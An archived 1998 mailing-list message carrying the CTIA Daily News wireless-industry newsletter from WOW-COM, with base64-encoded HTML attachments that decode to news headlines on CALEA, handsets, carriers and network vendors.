PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDE0LCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5DVElBIEFwcGxhdWRz
IEZDQyBEZWNpc2lvbgpUbyBFeHRlbmQgQ0FMRUEgQ29tcGxpYW5jZTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj4iVGhl
IEZDQyBoYXMgdGFrZW4gYW4gaW1wb3J0YW50LWFuZCBuZWNlc3Nhcnktc3Rl
cAp0byBwcm9jZWVkIHdpdGggaW1wcm92aW5nIGxhdyBlbmZvcmNlbWVudCBp
biB0aGUgVW5pdGVkIFN0YXRlcywiIHNhaWQgVGhvbWFzCkUuIFdoZWVsZXIs
IHByZXNpZGVudCBhbmQgQ0VPIG9mIHRoZSBDZWxsdWxhciBUZWxlY29tbXVu
aWNhdGlvbnMgSW5kdXN0cnkKQXNzb2NpYXRpb24uICg8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3Mv
Ym9keV9uZXdzLmNmbT9ORVdTX0lEPTM0MTAiPldPVy1DT008L0E+KQooPEEg
SFJFRj0iaHR0cDovL3d3dy5mY2MuZ292L0J1cmVhdXMvV2lyZWxlc3MvTmV3
c19SZWxlYXNlcy8xOTk4L25yd2w4MDM5Lmh0bWwiPkZDQzwvQT4pCig8QSBI
UkVGPSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJhcnkvdGVjaC85OC8w
OS9iaXp0ZWNoL2FydGljbGVzLzE0ZGF0YS5odG1sIj5OWVRJTUVTPC9BPikK
KDxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy9idXNp
bmVzcy9zdG9yeS8xNDk4Ni5odG1sIj5XSVJFRDwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNw
cmludCBQQ1MgT2ZmZXJzIFRhbGtpbmcKQ2VsbCBQaG9uZTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5TYW1zdW5nJ3Mg
bmV3IFNDSC0yMDAwIENlbGwgUGhvbmUgdGFsa3MKdG8gaXRzIHVzZXJzIHZp
YSBhIGZlbWFsZSB2b2ljZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGlu
Z3RvbnBvc3QuY29tL3dwLXNydi9XUGxhdGUvMTk5OC0wOS8xNC8wMThsLTA5
MTQ5OC1pZHguaHRtbCI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQg
UGxhbnMgVG8gQW5ub3VuY2UKTmV3IFRlY2hub2xvZ3kgRm9yIFBob25lIENv
bXBhbmllczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5MdWNlbnQncyBJbnRlbGxpZ2VudCBOZXR3b3JrIFBsYXRmb3Jt
CndpbGwgaW50ZXJmYWNlIElOIE1lc3NhZ2luZyB3aXRoIGUtbWFpbCwgdm9p
Y2UtbWFpbCBhbmQgd2lyZWxlc3Mgb2ZmZXJpbmcKbmV3IG1lc3NhZ2luZyBz
ZXJ2aWNlcyBhbmQgZWFzaWVyIG5hdmlnYXRpb24uICg8QSBIUkVGPSJodHRw
Oi8vd3d3LnpkbmV0LmNvbS9pbnR3ZWVrL2RhaWx5Lzk4MDkxNGguaHRtbCI+
WkRORVQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5TZWxlY3RpbmcgV2lyZWxlc3MgU2Vydmlj
ZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5IZWxwZnVsIGhpbnRzIG9uIHNlYXJjaGluZyBmb3Igd2lyZWxlc3MKc2Vy
dmljZSBvbiB0aGUgd2ViLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5zbWFydG1v
bmV5LmNvbS9hYy9iZXN0YnV5cy9jb21tdW5pY2F0aW9ucy9pbmRleC5jZm0/
c3Rvcnk9Y2VsbHByb3ZpZGVyIj5TTUFSVDwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkludmVz
dG9ycyBXYXJ5IE9mIENhbmFkYSdzCk1vYmlsZSBQaG9uZSBTZXJ2aWNlPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlJl
Y2VudCBkZWNsaW5lIGluIENhbmFkYSdzIG1vYmlsZSBwaG9uZQpvcGVyYXRv
cnMnIHNoYXJlcywgaGFzIGRldGVycmVkIGludmVzdG9ycyBmcm9tIHRoZSBp
bmR1c3RyeS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudGhlZ2xvYmVhbmRtYWls
LmNvbS9kb2NzL25ld3MvMTk5ODA5MTQvUk9CRnJvbnQvcm91dGwuaHRtbCI+
R0xPQkU8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5UYW1wYSBCYXkgRXhlY3V0aXZlIEFpcnBv
cnQKaW4gT2Rlc3NhIFdhbnRzIENlbGwgVG93ZXIgTGltaXRzPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNvbnN0cnVj
dGlvbiBvZiBmaXZlIG5ldyB0b3dlcnMgd2l0aGluCjUgbWlsZXMgb2YgVGFt
cGEncyBhaXJwb3J0IGhhcyBzcGFya2VkIGNvbmNlcm5zIGJ5IGFpcnBvcnQg
bWFuYWdlbWVudC4KKDxBIEhSRUY9Imh0dHA6Ly93d3cudGFtcGF0cmliLmNv
bS9uZXdzL3Bhc2NvLmh0bSI+VEFNUEE8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5XYXZlUmlk
ZXIgQ29tbXVuaWNhdGlvbnMKSW50cm9kdWNlcyBXaXJlbGVzcyBNb2RlbXMg
YW5kIEludGVybmV0IEFjY2VzcyBTZXJ2aWNlPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoaXMgc21hbGwgQ2FuYWRp
YW4gc3RhcnR1cCBzYXlzIGl0cyBuZXcKd2lyZWxlc3Mgc2VydmljZXMgY3V0
IGNvc3RzIGZvciBJU1BzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53aXJlZC5j
b20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE0OTc3Lmh0bWwiPldJUkVE
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+Tm9ydGVsIGFuZCBXaXJlbGVzcyBJSQpXaWxsIFBy
b3ZpZGUgQ0RNQSBTZXJ2aWNlIHRvIFJ1cmFsIE5lYnJhc2thPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkluIGEgdGhy
ZWUgeWVhciwgVVMkNCBtaWxsaW9uIGNvbnRyYWN0LApOb3J0ZWwgKE5vcnRo
ZXJuIFRlbGVjb20pIChOWVNFOiBOVC9UU0U6IE5UTCkgd2lsbCBzdXBwbHkg
V2lyZWxlc3MgSUksCkwuTC5DIHdpdGggc3dpdGNoaW5nIGFuZCBiYXNlIHN0
YXRpb24gZXF1aXBtZW50IHRoYXQgd2lsbCBwcm92aWRlIGZpeGVkCmFuZCBt
b2JpbGUgdGVsZXBob25lIHNlcnZpY2UgdXNpbmcgY2RtYU9uZSAoSVMtOTUg
Q0RNQSkgZGlnaXRhbCB3aXJlbGVzcwp0ZWNobm9sb2d5LiAoPEEgSFJFRj0i
aHR0cDovL3d3dy5wcm5ld3N3aXJlLmNvbS9jZ2ktYmluL3N0b3JpZXMucGw/
QUNDVD0xMDQmU1RPUlk9L3d3dy9zdG9yeS8wOS0xNC0xOTk4LzAwMDA3NTAw
ODcmRURBVEU9Ij5QUk5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5BaXJvbmV0IFdpcmVs
ZXNzIENvbW11bmljYXRpb25zClNlbGVjdGVkIGFzIFByZWZlcnJlZCBXaXJl
bGVzcyBMQU4gVmVuZG9yIGJ5IE1vbmFyY2ggTWFya2luZyBTeXN0ZW1zPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkFp
cm9uZXQgV2lyZWxlc3MgQ29tbXVuaWNhdGlvbnMgSW5jLiwKYSBsZWFkaW5n
IHByb3ZpZGVyIG9mIHdpcmVsZXNzIExBTiBzb2x1dGlvbnMsIGFubm91bmNl
ZCB0b2RheSB0aGF0IE1vbmFyY2gKTWFya2luZyBTeXN0ZW1zIChEYXl0b24s
IE9IKSwgdGhlIHdvcmxkd2lkZSBsZWFkZXIgaW4gaWRlbnRpZmljYXRpb24s
IHByaWNpbmcKYW5kIHRyYWNraW5nIHNvbHV0aW9ucywgc2VsZWN0ZWQgQWly
b25ldCBhcyB0aGVpciB3aXJlbGVzcyBMb2NhbCBBcmVhIE5ldHdvcmsKKExB
TikgdmVuZG9yIG9mIGNob2ljZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cucHJu
ZXdzd2lyZS5jb20vY2dpLWJpbi9zdG9yaWVzLnBsP0FDQ1Q9MTA0JlNUT1JZ
PS93d3cvc3RvcnkvMDktMTQtMTk5OC8wMDAwNzQ5OTk3JkVEQVRFPSI+UFJO
RVdTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+RG9uIFdhcmtlbnRpbiBSZS1FbGVjdGVkCkNo
YWlyIG9mIEdTTSBBbGxpYW5jZTs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5C
b2IgQnJvd24gTmFtZWQgU2VjcmV0YXJ5L1RyZWFzdXJlcjwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgTm9ydGgg
QW1lcmljYW4gR1NNIEFsbGlhbmNlIEwuTC5DLgphbm5vdW5jZWQgdG9kYXkg
dGhhdCBEb24gV2Fya2VudGluLCBQcmVzaWRlbnQgYW5kIENoaWVmIEV4ZWN1
dGl2ZSBPZmZpY2VyCm9mIEFlcmlhbCBDb21tdW5pY2F0aW9ucywgSW5jLiwg
aGFzIGJlZW4gcmUtZWxlY3RlZCBDaGFpcm1hbiBvZiB0aGUgQWxsaWFuY2Uu
Jm5ic3A7CkluIGFkZGl0aW9uLCBCb2IgQnJvd24sIERpcmVjdG9yIG9mIHRo
ZSBHU00gQWxsaWFuY2UsIHdhcyBuYW1lZCB0byBzZXJ2ZQphcyB0aGUgZ3Jv
dXAncyBTZWNyZXRhcnkgYW5kIFRyZWFzdXJlci4gKDxBIEhSRUY9Imh0dHA6
Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9i
b2R5X25ld3MuY2ZtP05FV1NfSUQ9MzQxMSI+V09XLUNPTTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPkZpcnN0IFJlcG9ydGVkIFNldHRsZW1lbnQKb2YgWWVhciAyMDAwIENv
bXB1dGVyIExpdGlnYXRpb248L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VGVjIEFtZXJpY2Egb2YgQXRsYW50YSBzZXR0
bGVkIHdpdGggUHJvZHVjZQpQYWxhY2UgSW50ZXJuYXRpb25hbCBmb3IgJDI1
MCwwMDAuICg8QSBIUkVGPSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJh
cnkvdGVjaC85OC8wOS9iaXp0ZWNoL2FydGljbGVzLzE0c3VpdC5odG1sIj5O
WVRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+QmVsbFNvdXRoIFBsYW5zIFRvIEJpbGwK
SW50ZXJuZXQgUHJvdmlkZXJzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkJlbGxTb3V0aCBDb3JwLiBpcyB0aHJlYXRl
bmluZyB0byBjaGFyZ2UKSW50ZXJuZXQgc2VydmljZSBwcm92aWRlcnMgYW5k
IG90aGVyIHNwZWNpYWxpemVkIGNhcnJpZXJzIGxvbmctZGlzdGFuY2UKYWNj
ZXNzIGZlZXMgZm9yIHVzaW5nIHRoZSBJbnRlcm5ldCB0byBjYXJyeSBsb25n
LWRpc3RhbmNlIHRlbGVwaG9uZSB2b2ljZQp0cmFmZmljLiAoPEEgSFJFRj0i
aHR0cDovL3d3dy5sYXRpbWVzLmNvbS9IT01FL05FV1MvQlVTSU5FU1MvdDAw
MDA4MzU4Mi4xLmh0bWwiPkxBVElNRVM8L0E+KQooPEEgSFJFRj0iaHR0cDov
L3d3dy53aXJlZC5jb20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE0OTg5
Lmh0bWwiPldJUkVEPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRk
aXRpb25hbCBuZXdzIGFib3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5j
bHVkaW5nIHBlcmlvZGljIG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBk
YXktLXZpc2l0CjxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0
dHA6Ly93d3cud293LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJ
RFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT5DVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5z
bWl0dGVkIHdlZWtkYXlzLCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1
cyBvbiB0aGUgV29ybGQgV2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3
dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNv
bS5jb20vcHJvZmVzc2lvbmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZu
YnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPS0xPklmIHlvdSBhcmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5n
IHRoZSBDVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2Vu
ZCBhIG1lc3NhZ2UgdG8KPEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0Rh
aWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5
X05ld3NAdW0yLnVuaXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZP
TlQ+Jm5ic3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWls
eV9OZXdzQHVtMi51bml0eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0
aGUgVE8gc2VjdGlvbiBvZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioq
PC9CPiZuYnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPS0xPlBsZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBp
biB0b2RheSdzIG5ld3MgYXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9z
ZSBsaW5rcyBtYXkgbm90IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMg
dGhyb3VnaG91dCB0aGUgZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291
cmNlcwptYXkgYmUgc3Vic2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVn
aXN0cmF0aW9uLjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+CjwvVEFCTEU+PC9DRU5URVI+Cgo8Q0VOVEVS
PiZuYnNwOzwvQ0VOVEVSPgoKPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 14 Sep 1998 14:55:39 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 14, 1998
Message-ID: <199809142145.QAA20445@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

Your company just formed a partnership in a country you
never heard of.  Are you worried about international roaming
fraud?  You should be. 

CTIA's Wireless Security '98 - It's Just Smart Business.
Orlando, Florida  November 9 - 11, 1998 
http://www.wow-com.com/professional 

Team WOW-COM
wowcom@ctia.org
===========================================
 




--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00017.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00017.bin"
Content-Description: "_CTIA_Daily_News_19980914a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDE0LCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5DVElBIEFwcGxhdWRz
IEZDQyBEZWNpc2lvbgpUbyBFeHRlbmQgQ0FMRUEgQ29tcGxpYW5jZTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj4iVGhl
IEZDQyBoYXMgdGFrZW4gYW4gaW1wb3J0YW50LWFuZCBuZWNlc3Nhcnktc3Rl
cAp0byBwcm9jZWVkIHdpdGggaW1wcm92aW5nIGxhdyBlbmZvcmNlbWVudCBp
biB0aGUgVW5pdGVkIFN0YXRlcywiIHNhaWQgVGhvbWFzCkUuIFdoZWVsZXIs
IHByZXNpZGVudCBhbmQgQ0VPIG9mIHRoZSBDZWxsdWxhciBUZWxlY29tbXVu
aWNhdGlvbnMgSW5kdXN0cnkKQXNzb2NpYXRpb24uICg8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3Mv
Ym9keV9uZXdzLmNmbT9ORVdTX0lEPTM0MTAiPldPVy1DT008L0E+KQooPEEg
